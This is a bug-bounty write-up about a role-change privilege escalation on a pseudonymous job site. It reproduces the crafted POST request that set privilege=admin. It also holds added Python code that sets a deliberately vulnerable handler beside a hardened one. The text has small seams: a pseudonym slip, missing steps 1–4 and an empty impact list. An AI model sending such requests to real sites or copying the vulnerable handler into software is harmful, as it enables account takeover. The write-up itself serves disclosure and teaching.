In this write-up I explain how I discovered a role-changing vulnerability in a private program that allowed users to switch roles without admin privileges, and which earned me a $750 bounty. It covers the steps to reproduce this surprising bug and its potential impact.
Understanding Examlent.com (a pseudonym for the actual platform)
Examlent.com is an online job search and career information platform that connects job seekers with employers. It’s designed to help individuals find jobs, gain insights into salaries, and access valuable company information. Talent.com’s mission is to make the job search experience efficient and effective. As part of its services, Talent.com allows users to create accounts with specific roles and privileges, a crucial aspect of maintaining a secure and organized platform. Among these roles, administrators hold a special status, as they have the authority to manage user roles and permissions within the platform.
The Bug Discovery:
My journey began with two accounts on Examlent.com: one with standard user privileges and another with admin privileges. As a responsible bug hunter, I explored the platform, meticulously examining its different functionalities. I found a feature that allows an admin to change other users' roles, and wondered what would happen if a low-level user tried to change their own permissions. That is how I stumbled upon a privilege escalation bug, a vulnerability that could lead to unauthorized role changes and compromise the platform's security.
Steps to Reproduce:
Here's how I found and reproduced the bug. The role-update request, captured from the standard user's session, looked like this (the request body had been run together with the last header in the original capture; it is shown here on its own line):
POST /employers/settings/ajax/action-update-user.php?country=us&language=en HTTP/1.1
Host: in.examlent.com
Cookie:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,hi;q=0.8,pt;q=0.7
Connection: close

firstName=user&lastName=user&[email protected]&user=FDRsoKzZEYJjdWUYxETG1iFf-bgI*&privilege=admin
5. I sent the request, and like magic, the standard user became an admin.
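The root cause is a missing server-side authorization check: the endpoint trusted the `privilege` value in the request body instead of checking who the authenticated caller was. The following Python model, added here as an example and not code from the write-up or from the platform, shows a minimal handler for such an "update user" action in a vulnerable form beside a hardened form that authorizes against the server-side session and writes an audit record for every attempted role change. All names (`User`, `Session`, `Store`, `update_user_vulnerable`, `update_user_fixed`, `run_scenario`), the role list and the sample accounts are hypothetical constructions for the demonstration.

```python
from dataclasses import dataclass, field

# Hypothetical role set for the demo; the real platform's roles are not known.
ROLES = ("user", "manager", "admin")


@dataclass
class User:
    user_id: str
    email: str
    privilege: str = "user"


@dataclass
class Session:
    # The identity the server has already authenticated from the session cookie.
    user: User


@dataclass
class Store:
    users: dict = field(default_factory=dict)
    audit: list = field(default_factory=list)  # (event, actor, target, ...) tuples


class Forbidden(Exception):
    """Raised when the caller is not allowed to perform the requested change."""


def update_user_vulnerable(session, store, form):
    """Vulnerable pattern: the handler applies whatever privilege the form carries.
    Anyone who can reach the endpoint can set any role on any user, including
    their own account, because the caller's role is never consulted."""
    target = store.users[form["user"]]
    target.privilege = form["privilege"]
    return target.privilege


def update_user_fixed(session, store, form):
    """Hardened pattern: authorization is decided from the server-side session,
    never from the submitted body. Role changes require an admin caller, are
    never applied to the caller's own account, and are always audited."""
    actor = session.user
    target = store.users.get(form["user"])
    if target is None:
        raise KeyError("unknown user")
    new_priv = form.get("privilege", target.privilege)
    if new_priv not in ROLES:
        raise ValueError("invalid privilege value")
    if new_priv != target.privilege:
        if actor.privilege != "admin" or actor.user_id == target.user_id:
            # Denied attempts are logged: a non-admin submitting a privilege
            # field is exactly the signal a detection rule would look for.
            store.audit.append(("DENIED", actor.user_id, target.user_id, new_priv))
            raise Forbidden("role change not permitted")
        store.audit.append(("ROLE_CHANGE", actor.user_id, target.user_id,
                            target.privilege, new_priv))
        target.privilege = new_priv
    return target.privilege


def run_scenario(handler):
    """Constructed scenario mirroring the write-up: a standard user submits
    privilege=admin for their own account. Returns (privilege afterwards, audit log)."""
    store = Store()
    low = User("u-low", "user@example.invalid", "user")
    adm = User("u-adm", "admin@example.invalid", "admin")
    store.users = {low.user_id: low, adm.user_id: adm}
    form = {"user": "u-low", "firstName": "user", "lastName": "user", "privilege": "admin"}
    try:
        handler(Session(low), store, form)
    except Forbidden:
        pass
    return store.users["u-low"].privilege, store.audit


def run_admin_scenario():
    """Constructed control case: an admin legitimately promotes another user."""
    store = Store()
    low = User("u-low", "user@example.invalid", "user")
    adm = User("u-adm", "admin@example.invalid", "admin")
    store.users = {low.user_id: low, adm.user_id: adm}
    update_user_fixed(Session(adm), store, {"user": "u-low", "privilege": "manager"})
    return store.users["u-low"].privilege, store.audit


if __name__ == "__main__":
    print("vulnerable handler:", run_scenario(update_user_vulnerable)[0])  # admin
    print("fixed handler:     ", run_scenario(update_user_fixed)[0])       # user
    print("admin promotion:   ", run_admin_scenario()[0])                  # manager
```

The hardened handler makes two design choices worth copying: the decision is bound to the session identity rather than to any field the client controls, and the denied attempt is recorded rather than silently dropped, so a monitoring rule can alert on a non-admin session sending a `privilege` parameter at all.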
The Impact:
This bug could have significant consequences, including:
The Bounty
After responsibly disclosing this vulnerability to Examlent.com, the bug bounty program awarded me a well-deserved $750 bounty. The platform's security team recognized the severity of the issue and acted swiftly to fix it.
Takeaway
Always explore the admin-level features and permissions with low-level user accounts. You might uncover critical security flaws that can benefit both you and the platform’s security.
Leave some claps if you enjoyed this read, leave your feedback in the comments, and consider following me for more exciting findings.
Find me on Twitter: @a13h1_
Keep Supporting, Keep Clapping, Keep Commenting.